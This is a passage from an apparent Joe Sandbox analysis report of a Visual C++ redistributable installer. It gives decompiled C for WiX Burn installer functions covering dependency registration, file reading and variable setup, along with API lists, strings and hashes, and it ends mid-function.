                                                                          				signed int _t110;
                                                                          				signed int _t111;
                                                                          				signed int _t115;
                                                                          				intOrPtr* _t119;
                                                                          				signed int _t122;
                                                                          				signed int _t126;
                                                                          				short* _t127;
                                                                          				signed int _t131;
                                                                          				signed int _t132;
                                                                          				signed int _t139;
                                                                          				signed int _t143;
                                                                          				intOrPtr* _t147;
                                                                          				signed int* _t148;
                                                                          				signed int _t149;
                                                                          				intOrPtr _t152;
                                                                          				signed int _t154;
                                                                          				signed int* _t157;
                                                                          				signed int _t159;
                                                                          				signed int _t160;
                                                                          				signed int _t163;
                                                                          				signed int _t164;
                                                                          				int _t165;
                                                                          				signed int _t166;
                                                                          				void* _t167;
                                                                          
                                                                          				_t147 = _a4;
                                                                          				_t163 = _a8;
                                                                          				_t107 = 1;
                                                                          				_v8 = 0;
                                                                          				 *((intOrPtr*)(_t147 + 0x10)) = 1;
                                                                          				_t164 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				if( *((intOrPtr*)(_t163 + 0xc)) == 0 && _a12 != 4) {
                                                                          					_t107 = 0;
                                                                          				}
                                                                          				 *((intOrPtr*)(_t147 + 0x18)) = _t107;
                                                                          				 *(_t147 + 0x1c) = 0;
                                                                          				_t11 = _t163 + 0x40; // 0x6c0065
                                                                          				_t148 =  *_t11;
                                                                          				if(_t148 != 0) {
                                                                          					__eflags =  *_t148;
                                                                          					_t109 =  !=  ? _t148 : 0;
                                                                          				} else {
                                                                          					_t12 = _t163 + 0x10; // 0x6c0064
                                                                          					_t109 =  *_t12;
                                                                          				}
                                                                          				_a4 = _t109;
                                                                          				if( *_t147 != 3) {
                                                                          					__eflags =  *(_t163 + 0x2c);
                                                                          					if(__eflags != 0) {
                                                                          						L43:
                                                                          						_v20 = 1;
                                                                          						L44:
                                                                          						_t63 = _t163 + 0x54; // 0x6c44746c
                                                                          						_t110 = E00054212(_t163, __eflags,  *_t63, 0);
                                                                          						__eflags = _t110;
                                                                          						if(_t110 == 0) {
                                                                          							L47:
                                                                          							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000003;
                                                                          							L50:
                                                                          							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000004;
                                                                          							_t149 = 0;
                                                                          							 *(_t147 + 0x38) = 1;
                                                                          							_a20 = 0;
                                                                          							__eflags =  *(_t163 + 0xb8);
                                                                          							if( *(_t163 + 0xb8) <= 0) {
                                                                          								L60:
                                                                          								_t111 = _a4;
                                                                          								__eflags = _t111;
                                                                          								if(_t111 == 0) {
                                                                          									goto L67;
                                                                          								}
                                                                          								__eflags =  *(_t163 + 0x40);
                                                                          								if( *(_t163 + 0x40) != 0) {
                                                                          									L63:
                                                                          									_t115 = E00037B00(_t149, _t163, _t111);
                                                                          									__eflags = _t115;
                                                                          									if(_t115 != 0) {
                                                                          										goto L67;
                                                                          									}
                                                                          									_t99 = _t163 + 0x10; // 0x6c0064
                                                                          									_t164 = E00020D8A(_t147, 1, _a4,  *_t99);
                                                                          									__eflags = _t164;
                                                                          									if(_t164 >= 0) {
                                                                          										goto L67;
                                                                          									}
                                                                          									_push("Failed to add registration action for self dependent.");
                                                                          									goto L66;
                                                                          								}
                                                                          								__eflags = _v20;
                                                                          								if(_v20 != 0) {
                                                                          									goto L67;
                                                                          								}
                                                                          								goto L63;
                                                                          							}
                                                                          							_t157 = 0;
                                                                          							__eflags = 0;
                                                                          							_a24 = 0;
                                                                          							do {
                                                                          								_t74 = _t163 + 0xb4; // 0x280027
                                                                          								_t119 =  *_t74 + _t157;
                                                                          								_a16 = _t119;
                                                                          								__eflags =  *_t119 - 5;
                                                                          								if( *_t119 != 5) {
                                                                          									goto L59;
                                                                          								}
                                                                          								_a8 = _a8 & 0x00000000;
                                                                          								__eflags =  *(_t119 + 0xa0);
                                                                          								if( *(_t119 + 0xa0) <= 0) {
                                                                          									goto L59;
                                                                          								}
                                                                          								_t152 = 0;
                                                                          								__eflags = 0;
                                                                          								_a12 = 0;
                                                                          								do {
                                                                          									_v24 =  *((intOrPtr*)(_t119 + 0x9c)) + _t152;
                                                                          									_t122 = E00037B00(_t152, _t163,  *( *((intOrPtr*)(_t119 + 0x9c)) + _t152));
                                                                          									__eflags = _t122;
                                                                          									if(_t122 != 0) {
                                                                          										goto L57;
                                                                          									}
                                                                          									_t83 = _a16 + 0x18; // 0x6f0063
                                                                          									_t164 = E00020D8A(_t147, 1,  *_v24,  *_t83);
                                                                          									__eflags = _t164;
                                                                          									if(_t164 < 0) {
                                                                          										_push("Failed to add registration action for dependent related bundle.");
                                                                          										goto L66;
                                                                          									}
                                                                          									L57:
                                                                          									_t119 = _a16;
                                                                          									_t159 = _a8 + 1;
                                                                          									_t152 = _a12 + 0x10;
                                                                          									_a8 = _t159;
                                                                          									_a12 = _t152;
                                                                          									_t90 = _t119 + 0xa0; // 0x6c0065
                                                                          									__eflags = _t159 -  *_t90;
                                                                          								} while (_t159 <  *_t90);
                                                                          								_t149 = _a20;
                                                                          								_t157 = _a24;
                                                                          								L59:
                                                                          								_t149 = _t149 + 1;
                                                                          								_t157 = _t157 + 0xf8;
                                                                          								_a20 = _t149;
                                                                          								_a24 = _t157;
                                                                          								_t95 = _t163 + 0xb8; // 0x2a0029
                                                                          								__eflags = _t149 -  *_t95;
                                                                          							} while (_t149 <  *_t95);
                                                                          							goto L60;
                                                                          						}
                                                                          						__eflags =  *_t147 - 7;
                                                                          						if( *_t147 != 7) {
                                                                          							goto L50;
                                                                          						}
                                                                          						_t126 = E000296F2();
                                                                          						__eflags = _t126;
                                                                          						if(_t126 != 0) {
                                                                          							__eflags =  *_t147 - 7;
                                                                          							if( *_t147 == 7) {
                                                                          								_t66 = _t147 + 0x14;
                                                                          								 *_t66 =  *(_t147 + 0x14) | 0x00000002;
                                                                          								__eflags =  *_t66;
                                                                          							}
                                                                          							goto L50;
                                                                          						}
                                                                          						goto L47;
                                                                          					}
                                                                          					_v20 = 0;
                                                                          					__eflags =  *(_t163 + 0x34);
                                                                          					if(__eflags == 0) {
                                                                          						goto L44;
                                                                          					}
                                                                          					goto L43;
                                                                          				} else {
                                                                          					_t14 = _t163 + 0xbc; // 0x2c002b
                                                                          					_t127 =  *_t14;
                                                                          					_t165 = 2;
                                                                          					if(_t127 == 0) {
                                                                          						L10:
                                                                          						_t17 = _t163 + 0xbc; // 0x2c002b
                                                                          						_push( *_t17);
                                                                          						_t18 = _t163 + 0x44; // 0x320033
                                                                          						E0001550F(_t165, 0xa00000d1,  *_t18);
                                                                          						_t167 = _t167 + 0x10;
                                                                          						L11:
                                                                          						_t164 = E00055323( &_v8, 5, 1);
                                                                          						if(_t164 >= 0) {
                                                                          							_t131 = _a4;
                                                                          							__eflags = _t131;
                                                                          							if(_t131 == 0) {
                                                                          								L19:
                                                                          								__eflags = _a16 - 2;
                                                                          								if(_a16 == 2) {
                                                                          									L67:
                                                                          									if(_v8 != 0) {
                                                                          										E00055450(_t163, _v8);
                                                                          									}
                                                                          									if(_v16 != 0) {
                                                                          										E00058FC5(_v16, _v12);
                                                                          									}
                                                                          									return _t164;
                                                                          								}
                                                                          								_t132 = _a20;
                                                                          								_t166 = 0;
                                                                          								__eflags = _t132;
                                                                          								if(_t132 == 0) {
                                                                          									L25:
                                                                          									_t154 = _t166;
                                                                          									_a12 = _t154;
                                                                          									__eflags =  *(_t163 + 0xb8) - _t166;
                                                                          									if( *(_t163 + 0xb8) <= _t166) {
                                                                          										L34:
                                                                          										_t53 = _t163 + 0x44; // 0x320033
                                                                          										_t54 = _t163 + 0x4c; // 0x44746553
                                                                          										_t164 = E00058E07(_t154,  *_t54,  *_t53, _t166, _v8,  &_v16,  &_v12);
                                                                          										__eflags = _t164 - 0x80070002;
                                                                          										if(_t164 != 0x80070002) {
                                                                          											__eflags = _t164;
                                                                          											if(_t164 < 0) {
                                                                          												_push("Failed to check for remaining dependents during planning.");
                                                                          												L66:
                                                                          												_push(_t164);
                                                                          												E0005012F();
                                                                          												goto L67;
                                                                          											}
                                                                          											__eflags = _v12;
                                                                          											if(_v12 != 0) {
                                                                          												 *(_t147 + 0x1c) = 1;
                                                                          												 *_a24 =  *_a24 & 0x00000000;
                                                                          												E0001550F(2, 0xa00000d2, _v12);
                                                                          											}
                                                                          											goto L67;
                                                                          										}
                                                                          										_t164 = 0;
                                                                          										goto L67;
                                                                          									}
                                                                          									_t160 = _t166;
                                                                          									_a16 = _t166;
                                                                          									do {
                                                                          										_t31 = _t163 + 0xb4; // 0x280027
                                                                          										_t139 =  *_t31 + _t160;
                                                                          										_a20 = _t139;
                                                                          										__eflags =  *_t139 - 5;
                                                                          										if( *_t139 != 5) {
                                                                          											goto L33;
                                                                          										}
                                                                          										_a4 = _t166;
                                                                          										__eflags =  *((intOrPtr*)(_t139 + 0xa0)) - _t166;
                                                                          										if( *((intOrPtr*)(_t139 + 0xa0)) <= _t166) {
                                                                          											goto L33;
                                                                          										}
                                                                          										_t161 = _t166;
                                                                          										_a8 = _t166;
                                                                          										while(1) {
                                                                          											_t164 = E00037A49(_t154, _v8,  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x9c)) + _t161)));
                                                                          											__eflags = _t164;
                                                                          											if(_t164 < 0) {
                                                                          												break;
                                                                          											}
                                                                          											_t139 = _a20;
                                                                          											_t154 = _a4 + 1;
                                                                          											_t161 = _a8 + 0x10;
                                                                          											_a4 = _t154;
                                                                          											_a8 = _a8 + 0x10;
                                                                          											__eflags = _t154 -  *((intOrPtr*)(_t139 + 0xa0));
                                                                          											if(_t154 <  *((intOrPtr*)(_t139 + 0xa0))) {
                                                                          												continue;
                                                                          											}
                                                                          											_t154 = _a12;
                                                                          											_t166 = 0;
                                                                          											__eflags = 0;
                                                                          											_t160 = _a16;
                                                                          											goto L33;
                                                                          										}
                                                                          										_push("Failed to add dependent bundle provider key to ignore dependents.");
                                                                          										goto L66;
                                                                          										L33:
                                                                          										_t154 = _t154 + 1;
                                                                          										_t160 = _t160 + 0xf8;
                                                                          										_a12 = _t154;
                                                                          										_a16 = _t160;
                                                                          										_t49 = _t163 + 0xb8; // 0x2a0029
                                                                          										__eflags = _t154 -  *_t49;
                                                                          									} while (_t154 <  *_t49);
                                                                          									goto L34;
                                                                          								}
                                                                          								__eflags =  *_t132;
                                                                          								if( *_t132 == 0) {
                                                                          									goto L25;
                                                                          								}
                                                                          								_t164 = E00037A49(_t148, _v8, _t132);
                                                                          								__eflags = _t164;
                                                                          								if(_t164 >= 0) {
                                                                          									_t166 = 0;
                                                                          									__eflags = 0;
                                                                          									goto L25;
                                                                          								}
                                                                          								_push("Failed to add dependents ignored from command-line.");
                                                                          								goto L66;
                                                                          							}
                                                                          							_t143 = E00037B00(_t148, _t163, _t131);
                                                                          							__eflags = _t143;
                                                                          							if(_t143 == 0) {
                                                                          								goto L19;
                                                                          							}
                                                                          							_t21 = _t163 + 0x10; // 0x6c0064
                                                                          							_t164 = E00020D8A(_t147, 2, _a4,  *_t21);
                                                                          							__eflags = _t164;
                                                                          							if(_t164 >= 0) {
                                                                          								_t164 = E00037A49(_t148, _v8, _a4);
                                                                          								__eflags = _t164;
                                                                          								if(_t164 >= 0) {
                                                                          									goto L19;
                                                                          								}
                                                                          								_push("Failed to add self-dependent to ignore dependents.");
                                                                          								goto L66;
                                                                          							}
                                                                          							_push("Failed to allocate registration action.");
                                                                          							goto L66;
                                                                          						}
                                                                          						_push("Failed to create the string dictionary.");
                                                                          						goto L66;
                                                                          					}
                                                                          					_t15 = _t163 + 0x10; // 0x6c0064
                                                                          					if(CompareStringW(0, 1,  *_t15, 0xffffffff, _t127, 0xffffffff) != _t165) {
                                                                          						goto L10;
                                                                          					}
                                                                          					 *(_t147 + 0x38) = _t165;
                                                                          					goto L11;
                                                                          				}
                                                                          			}

                                                                          0x00022bda
                                                                          0x00022bdd
                                                                          0x00022be1
                                                                          0x00022be4
                                                                          0x00022be7
                                                                          0x00022bea
                                                                          0x00022bf0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022bf2
                                                                          0x00022bf5
                                                                          0x00022bf5
                                                                          0x00022bf7
                                                                          0x00000000
                                                                          0x00022bf7
                                                                          0x00022c37
                                                                          0x00000000
                                                                          0x00022bfa
                                                                          0x00022bfa
                                                                          0x00022bfb
                                                                          0x00022c01
                                                                          0x00022c04
                                                                          0x00022c07
                                                                          0x00022c07
                                                                          0x00022c07
                                                                          0x00000000
                                                                          0x00022ba0
                                                                          0x00022b6e
                                                                          0x00022b71
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022b7c
                                                                          0x00022b7e
                                                                          0x00022b80
                                                                          0x00022b8c
                                                                          0x00022b8c
                                                                          0x00000000
                                                                          0x00022b8c
                                                                          0x00022b82
                                                                          0x00000000
                                                                          0x00022b82
                                                                          0x00022b19
                                                                          0x00022b1e
                                                                          0x00022b20
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022b22
                                                                          0x00022b30
                                                                          0x00022b32
                                                                          0x00022b34
                                                                          0x00022b4b
                                                                          0x00022b4d
                                                                          0x00022b4f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022b51
                                                                          0x00000000
                                                                          0x00022b51
                                                                          0x00022b36
                                                                          0x00000000
                                                                          0x00022b36
                                                                          0x00022b06
                                                                          0x00000000
                                                                          0x00022b06
                                                                          0x00022ac7
                                                                          0x00022ad5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022ad7
                                                                          0x00000000
                                                                          0x00022ad7

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00022ACD
                                                                          Strings
                                                                          • Failed to check for remaining dependents during planning., xrefs: 00022C73
                                                                          • crypt32.dll, xrefs: 00022B18, 00022C16, 00022D0B, 00022D80
                                                                          • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00022C37
                                                                          • Failed to add self-dependent to ignore dependents., xrefs: 00022B51
                                                                          • Failed to add dependents ignored from command-line., xrefs: 00022B82
                                                                          • Failed to create the string dictionary., xrefs: 00022B06
                                                                          • Failed to allocate registration action., xrefs: 00022B36
                                                                          • Failed to add registration action for self dependent., xrefs: 00022D9E
                                                                          • wininet.dll, xrefs: 00022D1E
                                                                          • Failed to add registration action for dependent related bundle., xrefs: 00022DD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                          • API String ID: 1825529933-1705955799
                                                                          • Opcode ID: 3a78601cdd021a0a3b33d08bf55f650b6d3c219bddf4e6d36203fc036b89897c
                                                                          • Instruction ID: f41e43cc29ccaf8525cb9b570823598a852427a740dd3d1ef931b027512bcdec
                                                                          • Opcode Fuzzy Hash: 3a78601cdd021a0a3b33d08bf55f650b6d3c219bddf4e6d36203fc036b89897c
                                                                          • Instruction Fuzzy Hash: DCB19D70A00626FFCB66DFA4E841BAEBBE5BF44310F108169F804AA251D770D961DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E000543A6(signed short _a4, signed short* _a8, long _a12, long _a16, long _a20, signed short _a24, signed short _a28) {
                                                                          				void* _v8;
                                                                          				signed short _v12;
                                                                          				char _v16;
                                                                          				WCHAR* _t36;
                                                                          				signed short _t38;
                                                                          				void* _t41;
                                                                          				signed short _t45;
                                                                          				signed short _t49;
                                                                          				signed short _t50;
                                                                          				long _t60;
                                                                          				signed short _t61;
                                                                          				signed short _t65;
                                                                          				signed short _t68;
                                                                          				signed short _t73;
                                                                          				intOrPtr _t76;
                                                                          				void* _t77;
                                                                          				long _t78;
                                                                          				signed short _t82;
                                                                          				long _t83;
                                                                          				signed short _t85;
                                                                          				void* _t86;
                                                                          				signed short* _t87;
                                                                          				signed short _t88;
                                                                          				signed short _t91;
                                                                          				signed short _t96;
                                                                          				signed short _t97;
                                                                          
                                                                          				_t83 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				if(_a8 != 0) {
                                                                          					__eflags = _a4;
                                                                          					if(_a4 != 0) {
                                                                          						_t36 = _a12;
                                                                          						__eflags = _t36;
                                                                          						if(_t36 != 0) {
                                                                          							__eflags = 0 -  *_t36;
                                                                          							if(0 !=  *_t36) {
                                                                          								_t86 = CreateFileW(_t36, 0x80000000, 5, 0, 3, 0x8000080, 0);
                                                                          								_v8 = _t86;
                                                                          								__eflags = _t86 - 0xffffffff;
                                                                          								if(_t86 != 0xffffffff) {
                                                                          									L14:
                                                                          									_t38 =  &_v16;
                                                                          									__imp__GetFileSizeEx(_t86, _t38);
                                                                          									__eflags = _t38;
                                                                          									if(_t38 != 0) {
                                                                          										__eflags = _a16 - _t83;
                                                                          										if(_a16 == _t83) {
                                                                          											L25:
                                                                          											__eflags = _a28;
                                                                          											if(_a28 == 0) {
                                                                          												_t76 = _v16;
                                                                          												_t39 = _v12;
                                                                          												_t73 = _t76 - _t83;
                                                                          												_t77 = _t76 - _t83;
                                                                          												_push(0);
                                                                          												_pop(0);
                                                                          												asm("sbb eax, edi");
                                                                          												__eflags = 0 - _v12;
                                                                          												if(__eflags > 0) {
                                                                          													L27:
                                                                          													_t87 = _a4;
                                                                          													__eflags =  *_t87;
                                                                          													if( *_t87 == 0) {
                                                                          														__eflags = _t73;
                                                                          														if(_t73 == 0) {
                                                                          															L30:
                                                                          															_t88 = 0;
                                                                          															 *_a8 = 0;
                                                                          															L51:
                                                                          															_t41 = _v8;
                                                                          															__eflags = _t41 - 0xffffffff;
                                                                          															if(_t41 != 0xffffffff) {
                                                                          																CloseHandle(_t41);
                                                                          															}
                                                                          															L53:
                                                                          															goto L54;
                                                                          														}
                                                                          														_t85 = E000138D4(_t73, 1);
                                                                          														__eflags = _t85;
                                                                          														if(_t85 != 0) {
                                                                          															L40:
                                                                          															_t78 = 0;
                                                                          															_t45 = 0;
                                                                          															_a12 = 0;
                                                                          															_a24 = 0;
                                                                          															while(1) {
                                                                          																_a16 = _t78;
                                                                          																_t88 = E00053D92(_t73, _t45,  &_a16);
                                                                          																__eflags = _t88;
                                                                          																if(_t88 < 0) {
                                                                          																	break;
                                                                          																}
                                                                          																_t49 = ReadFile(_v8, _a24 + _t85, _a16,  &_a12, 0);
                                                                          																__eflags = _t49;
                                                                          																if(_t49 == 0) {
                                                                          																	_t50 = GetLastError();
                                                                          																	__eflags = _t50;
                                                                          																	_t91 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                          																	__eflags = _t91;
                                                                          																	_t88 =  >=  ? 0x80004005 : _t91;
                                                                          																	E000137D3(0x80004005, "fileutil.cpp", 0x399, _t88);
                                                                          																	break;
                                                                          																}
                                                                          																_t45 = _a24 + _a12;
                                                                          																__eflags = _a12;
                                                                          																_a24 = _t45;
                                                                          																if(_a12 != 0) {
                                                                          																	_t78 = 0;
                                                                          																	__eflags = 0;
                                                                          																	continue;
                                                                          																}
                                                                          																__eflags = _t45 - _t73;
                                                                          																if(_t45 == _t73) {
                                                                          																	 *_a4 = _t85;
                                                                          																	_t85 = 0;
                                                                          																	 *_a8 = _t73;
                                                                          																} else {
                                                                          																	_t88 = 0x8000ffff;
                                                                          																}
                                                                          																break;
                                                                          															}
                                                                          															__eflags = _t85;
                                                                          															if(_t85 != 0) {
                                                                          																E00013999(_t85);
                                                                          															}
                                                                          															goto L51;
                                                                          														}
                                                                          														_t39 = 0x8007000e;
                                                                          														_push(0x8007000e);
                                                                          														_t88 = 0x8007000e;
                                                                          														_push(0x38c);
                                                                          														L16:
                                                                          														_push("fileutil.cpp");
                                                                          														E000137D3(_t39);
                                                                          														goto L51;
                                                                          													}
                                                                          													__eflags = _t73;
                                                                          													if(_t73 != 0) {
                                                                          														_t85 = E00013A72( *_t87, _t73, 1);
                                                                          														__eflags = _t85;
                                                                          														if(_t85 != 0) {
                                                                          															goto L40;
                                                                          														}
                                                                          														_t39 = 0x8007000e;
                                                                          														_push(0x8007000e);
                                                                          														_t88 = 0x8007000e;
                                                                          														_push(0x37f);
                                                                          														goto L16;
                                                                          													}
                                                                          													E00013999( *_t87);
                                                                          													 *_t87 = 0;
                                                                          													goto L30;
                                                                          												}
                                                                          												if(__eflags < 0) {
                                                                          													L34:
                                                                          													_t88 = 0x8007007a;
                                                                          													_push(0x8007007a);
                                                                          													_push(0x371);
                                                                          													goto L16;
                                                                          												}
                                                                          												__eflags = _a24 - _t77;
                                                                          												if(_a24 >= _t77) {
                                                                          													goto L27;
                                                                          												}
                                                                          												goto L34;
                                                                          											}
                                                                          											_t73 = _a24;
                                                                          											__eflags = 0;
                                                                          											goto L27;
                                                                          										}
                                                                          										_t83 = _a20;
                                                                          										__eflags = 0 - _v12;
                                                                          										if(__eflags < 0) {
                                                                          											L22:
                                                                          											_t60 = SetFilePointer(_t86, _t83, 0, 1);
                                                                          											__eflags = _t60 - 0xffffffff;
                                                                          											if(_t60 != 0xffffffff) {
                                                                          												goto L25;
                                                                          											}
                                                                          											_t39 = GetLastError();
                                                                          											__eflags = _t39;
                                                                          											_t88 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                          											__eflags = _t88;
                                                                          											if(_t88 >= 0) {
                                                                          												goto L25;
                                                                          											}
                                                                          											_push(_t88);
                                                                          											_push(0x35f);
                                                                          											goto L16;
                                                                          										}
                                                                          										if(__eflags > 0) {
                                                                          											L21:
                                                                          											_t88 = 0x80070057;
                                                                          											goto L51;
                                                                          										}
                                                                          										__eflags = _t83 - _v16;
                                                                          										if(_t83 <= _v16) {
                                                                          											goto L22;
                                                                          										}
                                                                          										goto L21;
                                                                          									}
                                                                          									_t61 = GetLastError();
                                                                          									__eflags = _t61;
                                                                          									_t96 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                          									_t39 = 0x80004005;
                                                                          									__eflags = _t96;
                                                                          									_t88 =  >=  ? 0x80004005 : _t96;
                                                                          									_push(_t88);
                                                                          									_push(0x351);
                                                                          									goto L16;
                                                                          								}
                                                                          								_t82 = GetLastError();
                                                                          								_t88 = 0x80070002;
                                                                          								__eflags = _t82;
                                                                          								_t65 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
                                                                          								__eflags = _t65 - 0x80070002;
                                                                          								if(_t65 == 0x80070002) {
                                                                          									goto L53;
                                                                          								}
                                                                          								__eflags = _t82;
                                                                          								if(_t82 == 0) {
                                                                          									_t86 = _v8;
                                                                          									goto L14;
                                                                          								}
                                                                          								_t97 = _t65;
                                                                          								__eflags = _t97;
                                                                          								_t88 =  >=  ? 0x80004005 : _t97;
                                                                          								E000137D3(0x80004005, "fileutil.cpp", 0x34c, _t88);
                                                                          								goto L53;
                                                                          							}
                                                                          							_t68 = 0x80070057;
                                                                          							_push(0x80070057);
                                                                          							_push(0x342);
                                                                          							goto L2;
                                                                          						}
                                                                          						_t68 = 0x80070057;
                                                                          						_push(0x80070057);
                                                                          						_push(0x341);
                                                                          					} else {
                                                                          						_t68 = 0x80070057;
                                                                          						_push(0x80070057);
                                                                          						_push(0x340);
                                                                          					}
                                                                          					goto L2;
                                                                          				} else {
                                                                          					_t68 = 0x80070057;
                                                                          					_push(0x80070057);
                                                                          					_push(0x33f);
                                                                          					L2:
                                                                          					_push("fileutil.cpp");
                                                                          					_t88 = _t68;
                                                                          					E000137D3(_t68);
                                                                          					L54:
                                                                          					return _t88;
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00054425
                                                                          • GetLastError.KERNEL32 ref: 0005443B
                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00054486
                                                                          • GetLastError.KERNEL32 ref: 00054490
                                                                          • CloseHandle.KERNEL32(?), ref: 00054650
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 3555958901-2299628883
                                                                          • Opcode ID: aa1e3e57d93cb3bee61ed41ec7cfde85cd44955584eeba3a0138b210fa043ec5
                                                                          • Instruction ID: 586ed2d914f79ed0645a203cde26635d50f67504e3ae6b28811858b8a80da678
                                                                          • Opcode Fuzzy Hash: aa1e3e57d93cb3bee61ed41ec7cfde85cd44955584eeba3a0138b210fa043ec5
                                                                          • Instruction Fuzzy Hash: B9713771A40615ABEF318E698C44BFF76D8EF0035AF114129FD19EB290E774CE848B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E000149DF(void* __ecx, void* __edx, char _a4, intOrPtr _a8) {
                                                                          				void* _v8;
                                                                          				void* __edi;
                                                                          				intOrPtr* _t34;
                                                                          				intOrPtr* _t35;
                                                                          				intOrPtr* _t37;
                                                                          				intOrPtr* _t40;
                                                                          				char _t60;
                                                                          				void* _t62;
                                                                          				intOrPtr _t64;
                                                                          				intOrPtr* _t72;
                                                                          
                                                                          				_t62 = __edx;
                                                                          				_t59 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_t64 = _a8;
                                                                          				_v8 = 1;
                                                                          				_t56 = _t64 + 0x88;
                                                                          				if(E00023E47(__ecx, _t64 + 0x3f4, _t64 + 0x88,  *((intOrPtr*)(_t64 + 0x20)),  *((intOrPtr*)(_t64 + 0x160))) >= 0) {
                                                                          					_t34 = E00019870(_t59, _t62, __eflags, _t56, _t64 + 0xac,  *((intOrPtr*)(_t64 + 0x20)),  *((intOrPtr*)(_t64 + 0x160)), _t64 + 0xf8,  &_v8);
                                                                          					__eflags = _t34;
                                                                          					if(_t34 >= 0) {
                                                                          						__eflags = _v8;
                                                                          						if(_v8 != 0) {
                                                                          							__eflags =  *((intOrPtr*)(_t64 + 0xb8));
                                                                          							if( *((intOrPtr*)(_t64 + 0xb8)) != 0) {
                                                                          								__eflags =  *((intOrPtr*)(_t64 + 0x20)) - 2;
                                                                          								if( *((intOrPtr*)(_t64 + 0x20)) > 2) {
                                                                          									E0002E3F4(_a4, 0, _t64 + 0x34);
                                                                          								}
                                                                          							}
                                                                          							_t35 = E0002E82A(_a4, _t64);
                                                                          							__eflags = _t35;
                                                                          							if(_t35 >= 0) {
                                                                          								__eflags = E00027B23(_t59, _t64);
                                                                          								if(__eflags >= 0) {
                                                                          									_t37 = E000237BC(_t59, _t62, __eflags,  *((intOrPtr*)(_t64 + 0x1c)), _t56);
                                                                          									__eflags = _t37;
                                                                          									if(_t37 >= 0) {
                                                                          										_t72 = E000205FF(_t59, _t64 + 0x100, _t56);
                                                                          										__eflags = _t72;
                                                                          										if(_t72 >= 0) {
                                                                          											_t40 =  *((intOrPtr*)(_t64 + 0x40));
                                                                          											_t60 = 0;
                                                                          											__eflags = _t40;
                                                                          											if(__eflags == 0) {
                                                                          												L22:
                                                                          												_a4 = _t60;
                                                                          												_t72 = E00014690(_t62, __eflags, _t64,  &_a4);
                                                                          												__eflags = _t72;
                                                                          												if(_t72 < 0) {
                                                                          													_push("Failed while running ");
                                                                          													goto L26;
                                                                          												}
                                                                          												__eflags = _a4;
                                                                          												if(_a4 == 0) {
                                                                          													goto L28;
                                                                          												}
                                                                          												L21:
                                                                          												_t60 = 0;
                                                                          												__eflags = 0;
                                                                          												goto L22;
                                                                          											}
                                                                          											__eflags =  *_t40;
                                                                          											if(__eflags == 0) {
                                                                          												goto L22;
                                                                          											}
                                                                          											_t72 = E00018197(_t56, L"WixBundleLayoutDirectory", _t40, 0);
                                                                          											__eflags = _t72;
                                                                          											if(_t72 >= 0) {
                                                                          												goto L21;
                                                                          											}
                                                                          											_push("Failed to set layout directory variable to value provided from command-line.");
                                                                          											goto L26;
                                                                          										}
                                                                          										_push("Failed to set registration variables.");
                                                                          										goto L26;
                                                                          									}
                                                                          									_push("Failed to set action variables.");
                                                                          									goto L26;
                                                                          								}
                                                                          								_push("Failed to query registration.");
                                                                          								goto L26;
                                                                          							} else {
                                                                          								_push("Failed to create the message window.");
                                                                          								L26:
                                                                          								_push(_t72);
                                                                          								E0005012F();
